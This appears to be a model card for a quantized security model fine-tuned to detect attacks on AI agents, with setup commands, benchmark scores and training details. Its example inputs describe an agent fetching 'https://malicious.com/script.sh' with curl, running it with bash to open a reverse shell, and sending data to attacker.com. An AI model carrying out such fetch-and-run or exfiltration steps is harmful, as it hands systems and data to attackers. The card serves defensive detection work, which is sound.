Agentic Safety Foundation-Sec V4 - GGUF

GGUF quantized model for efficient inference with llama.cpp, Ollama, and LM Studio.

🎯 Model Description

This is a Q4_K_M quantized version of Agentic Safety Foundation-Sec V4, specialized for:

  • πŸ”’ Agentic AI security analysis (prompt injection, goal hijacking, tool misuse)
  • πŸ“Š OpenTelemetry trace security monitoring
  • πŸ›‘οΈ Multi-agent attack detection
  • πŸ“‹ Security policy compliance (GDPR, HIPAA, PCI-DSS, SOC2)

πŸ“Š Performance

Metric                  Score
----------------------  --------------
Overall Accuracy        74.29% (52/70)
Agentic AI Security     70.0% (14/20)
MMLU Computer Security  74.00%
MMLU Security Studies   72.24%
Model Size (Q4_K_M)     ~4.9 GB

Category Breakdown

  • Access Control: 100.0% (3/3)
  • Security Operations: 85.7% (6/7)
  • Application Security: 83.3% (5/6)
  • Cryptography: 83.3% (5/6)
  • Threat Intelligence: 80.0% (8/10)
  • Security Fundamentals: 75.0% (6/8)
  • Agentic AI Security: 70.0% (14/20)
  • Network Security: 66.7% (4/6)

πŸš€ Quick Start

Ollama

# Create Modelfile
cat > Modelfile <<EOF
FROM ./agentic-safety-v4-q4_k_m.gguf

TEMPLATE """<|begin_of_text|><|start_header_id|>system<|end_header_id|>

You are a cybersecurity expert AI assistant specialized in analyzing agentic workflow security.<|eot_id|>
<|start_header_id|>user<|end_header_id|>

{{ .Prompt }}<|eot_id|>
<|start_header_id|>assistant<|end_header_id|>

"""

PARAMETER temperature 0.7
PARAMETER top_p 0.9
PARAMETER stop "<|eot_id|>"
PARAMETER stop "<|end_of_text|>"
EOF

# Create and run
ollama create agentic-safety-v4 -f Modelfile
ollama run agentic-safety-v4 "What is indirect prompt injection?"
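
For programmatic access, the same model can be queried over Ollama's local REST API (default port 11434). A minimal sketch using the standard /api/generate endpoint; with "stream": false the server returns a single JSON object whose "response" field holds the answer:

# Query the local Ollama server
curl http://localhost:11434/api/generate -d '{
  "model": "agentic-safety-v4",
  "prompt": "What is indirect prompt injection?",
  "stream": false
}'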

llama.cpp

# Download model
wget https://huggingface.co/guerilla7/agentic-safety-v4-gguf/resolve/main/agentic-safety-v4-q4_k_m.gguf

# Run inference
./llama-cli \
  -m agentic-safety-v4-q4_k_m.gguf \
  -p "Analyze this security trace for threats: An agent fetched emails, executed curl to external-api.com, wrote sensitive data to /tmp/, then sent data to attacker.com. What attack occurred?" \
  -n 512 \
  --temp 0.7 \
  --top-p 0.9
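
For longer-running use, llama.cpp also ships llama-server, which exposes an OpenAI-compatible HTTP endpoint. A minimal sketch, assuming the default port 8080; the request fields mirror the OpenAI chat completions schema:

# Start the server
./llama-server -m agentic-safety-v4-q4_k_m.gguf --port 8080

# Query the OpenAI-compatible chat endpoint
curl http://localhost:8080/v1/chat/completions \
  -H "Content-Type: application/json" \
  -d '{
    "messages": [
      {"role": "system", "content": "You are a cybersecurity expert AI assistant specialized in analyzing agentic workflow security."},
      {"role": "user", "content": "What is goal hijacking in agentic AI?"}
    ],
    "temperature": 0.7,
    "max_tokens": 512
  }'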

LM Studio

  1. Download agentic-safety-v4-q4_k_m.gguf
  2. Import into LM Studio
  3. Set system prompt: "You are a cybersecurity expert AI assistant specialized in analyzing agentic workflow security."
  4. Use for security analysis and Q&A

Python (llama-cpp-python)

pip install llama-cpp-python

from llama_cpp import Llama

llm = Llama(
    model_path="agentic-safety-v4-q4_k_m.gguf",
    n_ctx=2048,
    n_threads=8,
    n_gpu_layers=35  # Adjust based on your GPU
)

response = llm.create_chat_completion(
    messages=[
        {"role": "system", "content": "You are a cybersecurity expert AI assistant specialized in analyzing agentic workflow security."},
        {"role": "user", "content": "What is the difference between tool misuse and tool poisoning in agentic AI systems?"}
    ],
    temperature=0.7,
    top_p=0.9,
    max_tokens=512
)

print(response['choices'][0]['message']['content'])

πŸ”§ Quantization Details

  • Original Model: Foundation-Sec-8B-Instruct (fine-tuned with QLoRA)
  • Quantization Method: Q4_K_M (4-bit, K-quant, medium)
  • Size: ~4.9 GB (vs ~16 GB FP16)
  • Quality Retention: ~97-98% of original accuracy
  • Inference Speed: 2-3x faster than FP16

Available Quantizations

Variant  Size     Use Case
-------  -------  ---------------------------------------
Q4_K_M   ~4.9 GB  Recommended - Best quality/size balance
Q4_K_S   ~4.6 GB  Slightly smaller, minimal quality loss
Q5_K_M   ~5.8 GB  Higher quality, larger size
Q8_0     ~8.5 GB  Near-original quality
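
Other variants follow the usual llama.cpp workflow: convert the fine-tuned checkpoint to GGUF, then quantize. A sketch, assuming the QLoRA adapters have already been merged into the base weights and the merged model lives in ./Foundation-Sec-8B-Instruct (path is illustrative):

# Convert HF weights to an FP16 GGUF, then quantize to Q4_K_M
python convert_hf_to_gguf.py ./Foundation-Sec-8B-Instruct --outfile agentic-safety-v4-f16.gguf
./llama-quantize agentic-safety-v4-f16.gguf agentic-safety-v4-q4_k_m.gguf Q4_K_M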

πŸ“– Example Use Cases

1. Security Trace Analysis

Input:

Analyze this OpenTelemetry trace:
- Span 1: fetch_email(inbox) -> 15 emails
- Span 2: execute_tool(curl, 'https://malicious.com/script.sh') -> 200 OK
- Span 3: execute_tool(bash, 'script.sh') -> Reverse shell established

Output:

CRITICAL: Multi-stage attack detected
1. Attack Type: Command Injection + Tool Misuse
2. Severity: CRITICAL (CVSS 9.8)
3. Stages: Email enumeration β†’ Malicious script download β†’ Remote code execution
4. MITRE ATT&CK: T1059.004 (Command and Scripting Interpreter: Unix Shell)
5. Recommendations:
   - Block external script execution
   - Implement allowlist for curl destinations
   - Require human approval for bash tool invocation
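
A trace summary like the one above can be fed straight to the Ollama model from the Quick Start; trace-summary.txt is a hypothetical file holding the span listing:

# Triage a captured trace with the local model
ollama run agentic-safety-v4 "Analyze this OpenTelemetry trace for threats: $(cat trace-summary.txt)"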

2. Security Q&A

Input: "What is defense in depth for agentic systems?"

Output: "Defense in depth for agentic systems means implementing multiple layers of security controls: input validation (filter malicious prompts), tool authorization (restrict dangerous operations), output filtering (detect harmful responses), monitoring (trace analysis), and human oversight (approval for sensitive actions). No single control is perfect, so layered defenses ensure that if one fails, others catch the threat."

πŸŽ“ Training Details

Evolution

  • V2 Baseline: 80,851 examples β†’ 61.43% accuracy
  • V3 Targeted: +111 OWASP examples β†’ 67.14% accuracy
  • V4 Adversarial: +30 hard examples β†’ 74.29% accuracy

Training Data

  • Synthetic OpenTelemetry traces: 10,796
  • Core security datasets: 11,033 (AgentHarm, SafetyBench, PKU-SafeRLHF)
  • Policy compliance: 3,840 (GDPR, HIPAA, PCI-DSS, SOC2)
  • Attack patterns: 4,379 (multi-agent, jailbreak, code vulnerabilities)
  • Judge/eval datasets: 16,777 (Prometheus, HelpSteer, TruthfulQA, HaluEval)
  • Adversarial robustness: 3,000 (BeaverTails)
  • Synthetic expansions: 35,026 (Claude Sonnet 4.5)

Hardware

  • Platform: NVIDIA DGX Spark (Grace Blackwell, ARM64)
  • Training: QLoRA (4-bit NF4, rank 16)
  • Steps: 2,500 total (V2: 1,500, V3: 500, V4: 500)

βš–οΈ Limitations

  • Sample size: 70-question custom eval (20 agentic, 50 traditional)
  • Optimized for cybersecurity (may underperform on general tasks)
  • Training data: 43% synthetic (not production traces)
  • May miss novel attack patterns not in training data
  • Use as detection assist, not autonomous decision-maker

πŸ“œ License

Apache 2.0 (inherited from Foundation-Sec-8B-Instruct)

πŸ“ Citation

@misc{agentic-safety-v4-gguf-2025,
  title={Agentic Safety Foundation-Sec V4 GGUF: Quantized Cybersecurity Model for Agentic AI},
  author={Ron F. Del Rosario (guerilla7)},
  year={2025},
  publisher={Hugging Face},
  howpublished={\url{https://huggingface.co/guerilla7/agentic-safety-v4-gguf}}
}
